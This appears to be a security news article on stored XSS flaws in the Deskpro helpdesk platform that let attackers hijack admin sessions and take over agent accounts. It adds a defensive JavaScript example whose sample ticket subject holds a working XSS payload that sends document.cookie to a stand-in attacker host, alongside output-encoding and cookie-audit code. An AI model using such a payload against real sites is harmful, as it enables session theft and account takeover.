The Cyber Security News
Deskpro XSS flaws could hijack admin sessions, take over helpdesk agent accounts


Attackers could have exploited cross-site scripting (XSS) vulnerabilities found in the popular helpdesk platform Deskpro to hijack administrators' sessions and take over the accounts of helpdesk agents.

This would give the attackers the same privileges as admins and agents in terms of what they could execute and the data they could access, according to a blog post by the Checkmarx researchers who discovered the flaws while auditing the platform. Under certain circumstances, attackers could have reset the entire helpdesk, wiping all system data.

Given the shift to remote work and the need for helpdesk software that lets remote teams collaborate, Checkmarx audited Deskpro's security as part of the company's bug bounty program. Checkmarx researchers noted that attackers could exploit the issue in two ways:

Administrator session hijacking. This flaw was given a CVSS score of 8.8, which is rated high. The issue was found in Deskpro version 2020.2.9 running in a Docker container built from the official Deskpro Docker image. However, the underlying problem, a stored XSS vulnerability, also affects the cloud version. A malicious user can execute arbitrary script in the victim's browser to exfiltrate the session token. With the token in hand, the attacker can hijack the victim's session and perform actions on their behalf.

Agent account takeover. This vulnerability was assigned a CVSS score of 8.1, also rated high. The issue was likewise found in Deskpro 2020.2.9 running in a Docker container built from the official Deskpro Docker image, and here too the stored XSS vulnerability affects the cloud version. A malicious user can execute arbitrary script in the victim's browser, allowing them to take over the victim's account.
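The chain behind both findings is the same: a payload stored in a ticket field, rendered unescaped into a page, runs in the browser of whichever agent or admin opens it and reads the session cookie. The example below, added here and not taken from Deskpro's code or from the Checkmarx write-up, shows a vulnerable renderer next to an output-encoded one, and a small audit of the session cookie's attributes, because an HttpOnly cookie cannot be read by script even when the XSS does fire. The ticket fields, the cookie name `dp_session` and the attacker host `attacker.example` are constructed for the illustration.

```javascript
// Added example (not Deskpro's code): a stored XSS payload in a helpdesk
// ticket reaching an agent's browser, and two controls that break the
// session-hijack chain. All sample data below is constructed.

// A ticket as an attacker might submit it through a public form. The
// subject carries a payload that, if rendered as raw HTML, runs in the
// browser of whichever agent or admin opens the ticket and ships the
// cookie off to a host the attacker controls (hypothetical hostname).
const submittedTicket = {
  id: 4711,
  subject: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
  body: 'Hello, I cannot log in.',
};

// Vulnerable rendering: interpolates untrusted fields straight into markup.
function renderTicketUnsafe(ticket) {
  return `<div class="ticket"><h2>${ticket.subject}</h2><p>${ticket.body}</p></div>`;
}

// Output encoding for the HTML text context.
function escapeHtml(value) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '`': '&#96;',
  };
  return String(value).replace(/[&<>"'`]/g, (ch) => map[ch]);
}

// Hardened rendering: every untrusted field is encoded for the context it
// lands in, so the payload is displayed as text rather than executed.
function renderTicketSafe(ticket) {
  return `<div class="ticket"><h2>${escapeHtml(ticket.subject)}</h2><p>${escapeHtml(ticket.body)}</p></div>`;
}

// Crude check: does the markup contain a tag carrying an on*= event
// handler attribute? Enough to show the difference between the renderers;
// a real scanner would parse the HTML instead of pattern matching.
function containsActiveMarkup(html) {
  return /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Second control: a session cookie flagged HttpOnly is invisible to
// document.cookie, so this exfiltration route fails even if a payload
// runs. Parse a Set-Cookie header and report which attributes are missing.
function auditSessionCookie(setCookieHeader) {
  const parts = setCookieHeader.split(';').map((p) => p.trim());
  const attrs = new Set(parts.slice(1).map((p) => p.split('=')[0].toLowerCase()));
  const missing = [];
  if (!attrs.has('httponly')) missing.push('HttpOnly');
  if (!attrs.has('secure')) missing.push('Secure');
  if (!attrs.has('samesite')) missing.push('SameSite');
  return { name: parts[0].split('=')[0], missing };
}

// Constructed headers: the first is what you want to see, the second is not.
const hardenedCookie = 'dp_session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax';
const weakCookie = 'dp_session=abc123; Path=/';

// Stand-alone demo.
console.log('unsafe render active markup:', containsActiveMarkup(renderTicketUnsafe(submittedTicket)));
console.log('safe render active markup:  ', containsActiveMarkup(renderTicketSafe(submittedTicket)));
console.log('hardened cookie missing:', auditSessionCookie(hardenedCookie).missing);
console.log('weak cookie missing:    ', auditSessionCookie(weakCookie).missing);
```

Encoding at render time is the fix for the stored XSS itself; the cookie attributes are defence in depth that limit what a successful payload can do with the session token, and are worth checking on any helpdesk deployment regardless of which version is running.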

This finding once again proves that there is no such thing as error-free code, said Dirk Schrader, global vice president at New Net Technologies. Deskpro was quick in reacting to Checkmarx and in fixing the issue, he said, while asking for a 90-day hold period, which he said was reasonable to get the majority of installations patched.

"As usual, attackers will find those who have not heard the call," Schrader said. "Controlling all changes to your environment ensures detection of unwanted changes, and scanning for vulnerabilities regularly with an up-to-date scanner ensures that – should the call for patching have been missed – an additional alarm gets raised."


Some areas of this report are sourced from:
www.scmagazine.com
